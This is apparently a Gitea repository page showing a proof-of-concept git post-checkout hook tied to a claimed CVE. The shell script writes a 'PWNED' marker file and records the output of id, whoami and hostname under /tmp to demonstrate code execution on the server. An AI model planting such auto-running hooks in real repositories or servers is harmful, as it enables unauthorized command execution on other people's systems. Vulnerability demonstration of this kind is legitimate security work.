Files
poc-pwaabp/hooks/post-checkout
T
2026-07-29 07:59:01 +08:00

7 lines
156 B
Bash
Executable File

#!/bin/sh
echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt
id >> /tmp/gitea_pwn.txt
whoami >> /tmp/gitea_pwn.txt
hostname >> /tmp/gitea_pwn.txt